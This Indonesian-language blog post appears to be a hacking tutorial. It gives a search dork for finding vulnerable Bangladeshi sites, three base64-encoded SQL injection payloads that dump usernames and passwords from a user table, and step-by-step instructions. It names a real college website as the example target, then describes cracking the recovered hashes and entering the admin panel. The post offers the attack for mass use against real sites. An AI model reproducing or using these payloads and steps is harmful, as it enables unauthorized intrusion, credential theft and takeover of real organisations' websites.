Mungkin kalo sudah baca artikel saya tentang SQLI Base64 mungkin tau cara kerja exploit yang saya buat ini.
oke langsung saja ke intinya :
Dork : inurl : facilities.php?id=MQ== site:bd ( Kembangkan Sendiri supaya dapet banyak perawan )
Exploit :
- LTEnIFVOSU9OIEFMTCBTRUxFQ1QgMSwyLDMsbWFrZV9zZXQoNixAOj0weDBhLChzZWxlY3QoMSlmcm9tKGNvcmVfdXNlcl9pbmZvKXdoZXJlQDo9bWFrZV9zZXQoNTExLEAsMHgzYzZjNjkzZSxUQkwxMV9VU0VSX05BTUUsVEJMMTFfVVNFUl9QQVNTKSksQCksNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0IC0tIA==
- LTEnIFVOSU9OIEFMTCBTRUxFQ1QgMSwyLDMsbWFrZV9zZXQoNixAOj0weDBhLChzZWxlY3QoMSlmcm9tKGNvcmVfdXNlcl9pbmZvKXdoZXJlQDo9bWFrZV9zZXQoNTExLEAsMHgzYzZjNjkzZSxUQkwxMV9VU0VSX05BTUUsVEJMMTFfVVNFUl9QQVNTKSksQCksNSw2LDcsOCw5LDEwLDExIC0tIA==
- LTEnIFVOSU9OIEFMTCBTRUxFQ1QgMSwyLDMsbWFrZV9zZXQoNixAOj0weDBhLChzZWxlY3QoMSlmcm9tKGNvcmVfdXNlcl9pbmZvKXdoZXJlQDo9bWFrZV9zZXQoNTExLEAsMHgzYzZjNjkzZSxUQkwxMV9VU0VSX05BTUUsVEJMMTFfVVNFUl9QQVNTKSksQCksNSw2LDcsOCw5IC0tIA==
Oke di situ terdapat 3 exploit, terus bagaimana cara penggunaanya ?
simak baik - baik ya langkah demi langkahnya supaya mengerti .
Hasil dari dork inurl : facilities.php?id=MQ== site:bd
Untuk dork bisa di kembangkan sendiri yah :D
Jika sudah memasukan dorknya silakan pilih salah satu webnya.
Di sini saya pilih web http://www.dhakacollege.edu.bd/facilities.php?id=MQ== Sebagai target dan Contohnya.
Jika Sudah memilih webnya anda tinggal masukan exploitnya saja.
Bagaimana cara masukan exploitnya ?
yaitu anda tinggal mengganti tulisan MQ== dengan exploitnya. Misalnya anda menggunakan exploit nomer 1 gagal anda bisa menggunakan exploit nomer 2 atau 3. Perhatikan gambar berikut :
Nah lihat hasilnya muncul lah user dan passwordnya, anda tinggal men - cracknya saja.
Dan masuk kemenu adminya :D
oke sekian exploit sederhana yang saya buat ini :D
untuk yang ingin bertana - bertanya seputar artikel yang saya buat bisa chat saya langsung .
No comments:
Post a Comment